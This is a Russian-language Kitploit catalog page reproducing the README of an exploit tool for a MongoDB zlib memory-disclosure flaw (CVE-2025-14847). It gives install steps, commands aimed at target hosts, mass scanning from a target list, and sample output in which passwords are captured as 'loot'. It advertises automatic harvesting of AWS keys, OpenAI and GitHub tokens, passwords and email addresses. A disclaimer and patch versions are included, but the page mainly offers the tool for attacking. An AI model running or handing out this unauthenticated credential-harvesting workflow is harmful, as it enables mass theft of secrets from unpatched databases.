Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-14847_Expolit — критическая уязвимость раскрытия памяти в обработке сжатия zlib MongoDB. Этот инструмент позволяет исследователям безопасности извлекать конфиденциальные данные из уязвимых экземпляров MongoDB. | Kitploit
Инструменты/GitHubGitHub/cybertechajju/cve-2025-14847_expolit
Криминалистика памятиАнализ уязвимостейЭксплуатацияЭксфильтрация данныхСбор информацииТестирование на ПроникновениеОбнаружение СекретовОбучение и ОбразованиеБезопасность Баз Данных

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubcybertechajju/cve-2025-14847_expolit

CVE-2025-14847_Expolit

критическая уязвимость раскрытия памяти в обработке сжатия zlib MongoDB. Этот инструмент позволяет исследователям безопасности извлекать конфиденциальные данные из уязвимых экземпляров MongoDB.

Репозиторий
33338 месяцев назадПроверено Kitploit

MongoBleed-Pro ☠️

CVE Python License Status

Продвинутый инструмент эксплуатации утечки памяти MongoDB
Продолжайте учиться | Продолжайте взламывать с CyberTechAjju


🔥 О программе

MongoBleed-Pro — это продвинутый инструмент эксплуатации CVE-2025-14847, критической уязвимости раскрытия памяти в обработке сжатия zlib в MongoDB. Этот инструмент позволяет исследователям безопасности извлекать конфиденциальные данные из уязвимых экземпляров MongoDB.

⚠️ Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Всегда получайте соответствующее разрешение перед тестированием.


💀 Детали уязвимости


🚀 Возможности

  • ☠️ Стиль хакера — Элитный интерфейс терминала с анимацией
  • ⚡ Многопоточное сканирование — Быстрое извлечение памяти с настраиваемыми потоками
  • 🎯 Автоматическое обнаружение уязвимостей — Автоматическая проверка уязвимости перед эксплуатацией
  • 🔑 Обнаружение секретных паттернов — Находит ключи AWS, токены API, пароли, email-адреса
  • 📊 Прогресс в реальном времени — Визуализация утечки памяти в реальном времени
  • 💾 Экспорт данных — Сохраняет извлечённые данные в файлы для анализа
  • 🌐 Массовое сканирование — Сканирование нескольких целей из файла

📦 Установка

root@kitploit:~
# Клонирование репозитория
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit

# Установка зависимостей
pip install -r requirements.txt

🎮 Использование

Базовое использование

root@kitploit:~
python3 mongobleed_pro.py

Указать конкретный хост

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100

Свой порт

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100:27018

Массовое сканирование

root@kitploit:~
python3 mongobleed_pro.py --file targets.txt

Расширенные параметры

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000

Все опции


📸 Скриншоты

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  💀 ЗАПУСК ПОСЛЕДОВАТЕЛЬНОСТИ ИЗВЛЕЧЕНИЯ ПАМЯТИ 💀          ║
╚══════════════════════════════════════════════════════════════╝

⚡ Цель получена: 192.168.1.100:27017
   ✓ Порт ОТКРЫТ
   ☠️  УЯЗВИМО! Начинаем атаку...

  ◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
  ☠️  ДОБЫЧА ПОЛУЧЕНА: 🔐 Пароль
      → admin_pass=SuperSecret123

╔══════════════════ ИЗВЛЕЧЕНИЕ ЗАВЕРШЕНО ══════════════════╗
║  💾 Байт извлечено: 125,847
║  📦 Уникальных фрагментов: 342
║  🔑 Секретов найдено: 5
╚══════════════════════════════════════════════════════════╝

🔑 Обнаруженные типы секретов

  • 🔑 Ключи доступа AWS (AKIA...)
  • 🤖 Ключи API OpenAI (sk-...)
  • 🐙 Токены GitHub (ghp_...)
  • 🔐 Пароли и секреты
  • 📧 Электронные адреса

📁 Выходные файлы

ФайлОписание
loot_<host>.txtИзвлеченные секреты в читаемом формате
dump_<host>.binСырой дамп памяти для ручного анализа

🛡️ Устранение

Если вы администратор MongoDB, обновитесь до исправленных версий:

  • MongoDB 8.0.10+
  • MongoDB 7.3.6+
  • MongoDB 7.0.19+
  • MongoDB 6.0.23+

👤 Автор

CyberTechAjju

  • 🐦 Twitter: @CyberTechAjju

📜 Лицензия

Этот проект лицензирован по лицензии MIT — подробности в файле LICENSE.


⭐ Поддержка

Если вы нашли этот инструмент полезным, поставьте ⭐ на GitHub!


「 Продолжайте учиться | Продолжайте взламывать 」
Сделано с ❤️ от CyberTechAjju

Скачать инструмент
СвойствоОписание
CVE IDCVE-2025-14847
Тип уязвимостиРаскрытие памяти
Затронутые версииMongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23
ПричинаПереполнение буфера при чтении в декомпрессии zlib
ВоздействиеНеаутентифицированная удалённая утечка памяти
АргументОписаниеПо умолчанию
--targetЦелевой IP/URLИнтерактивный ввод
--fileФайл со списком целейNone
--threadsКоличество потоков50
--min-offsetМинимальное смещение памяти20
--max-offsetМаксимальное смещение памяти8192